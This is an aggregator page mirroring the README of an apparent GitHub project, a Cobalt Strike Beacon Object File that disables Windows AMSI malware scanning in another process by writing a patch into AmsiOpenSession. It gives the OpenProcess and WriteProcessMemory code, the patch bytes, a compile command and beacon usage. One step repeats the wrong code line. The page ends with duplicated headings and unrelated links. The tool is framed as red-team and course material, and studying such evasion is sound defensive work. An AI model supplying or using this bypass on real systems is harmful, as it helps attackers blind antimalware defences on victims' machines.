GitHub - boku7/injectAmsiBypass: Cobalt Strike BOF - Bypass AMSI in a remote pro... - JOYK Joy of Geek, Geek News, Link all geek

Cobalt Strike BOF - Inject AMSI Bypass

Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.

Running inject-amsiBypass BOF from CobaltStrike

What does this do?

1. Use supplied PID argument to get a handle on the remote process

hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);

2. Load AMSI.DLL into beacons memory and get the address of AMSI.AmsiOpenSession

hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);

Both beacon and the target process will both have the same address for the symbol.
If AMSI.DLL does not exist in the remote process, running this may crash the target process.

3. Write the AMSI bypass to the remote processes memory

unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax
BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten);

Method = AMSI.AmsiOpenSession

Uses the AMSI bypass technique taught in Offensive Security's PEN-300/OSEP (Evasion Techniques and Breaching Defenses) course.
- https://www.offensive-security.com/pen300-osep/

Proof of Concept Demo Screenshots

Before - Powershell.exe AMSI.AmsiOpenSession

After - Powershell.exe AMSI.AmsiOpenSession

Compile with x64 MinGW:

x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o

Run from Cobalt Strike Beacon Console

beacon> inject-amsiBypass <PID>

Make sure to load the inject-amsiBypass.cna script into Cobalt Strikes Script Manager

To Do List

Check that AMSI.DLL exists in remote process before injection
Add other AMSI bypasses to inject
Support x86

Credits / References

Raphael Mudge - Beacon Object Files - Luser Demo

https://www.youtube.com/watch?v=gfYswA_Ronw

Cobalt Strike - Beacon Object Files

https://www.cobaltstrike.com/help-beacon-object-files

BOF Code References

ajpc500/BOFs

https://github.com/ajpc500/BOFs/

trustedsec/CS-Situational-Awareness-BOF

https://github.com/trustedsec/CS-Situational-Awareness-BOF

Sektor7 Malware Dev Essentials course

https://institute.sektor7.net/red-team-operator-malware-development-essentials

Offensive Security OSEP

https://www.offensive-security.com/pen300-osep/

GitHub - boku7/injectAmsiBypass: Cobalt Strike BOF - Bypass AMSI in a remote pro...

Cobalt Strike BOF - Inject AMSI Bypass

Running inject-amsiBypass BOF from CobaltStrike

What does this do?

1. Use supplied PID argument to get a handle on the remote process

2. Load AMSI.DLL into beacons memory and get the address of AMSI.AmsiOpenSession

3. Write the AMSI bypass to the remote processes memory

Method = AMSI.AmsiOpenSession

Proof of Concept Demo Screenshots

Before - Powershell.exe AMSI.AmsiOpenSession

After - Powershell.exe AMSI.AmsiOpenSession

Compile with x64 MinGW:

Run from Cobalt Strike Beacon Console

To Do List

Credits / References

Raphael Mudge - Beacon Object Files - Luser Demo

Cobalt Strike - Beacon Object Files

BOF Code References

Sektor7 Malware Dev Essentials course

Offensive Security OSEP

Recommend

重塑冷链运输格局的数字化平台瑞云冷链获亿元Pre-A轮融资

Internet Computer (ICP) price bounces as Canister smart contract count surpasses...

Hello world • Svelte Examples

An Alternative Treatment For Back Pain

Interesting. So it is a Lanczos variant after all. Prior to FSR being released,...

斗地主老是输？一起用Python做个AI出牌器，欢乐豆蹭蹭涨！

Coinstore New Users get 30 USDT Futures Bonus for Trading

React v17.0 Release Candidate: No New Features

XinFin Partners with Guarda Wallet and Simplex to Provide Easy Fiat Onramp for X...

remount v0.11.0 ❘ Bundlephobia

About Joyk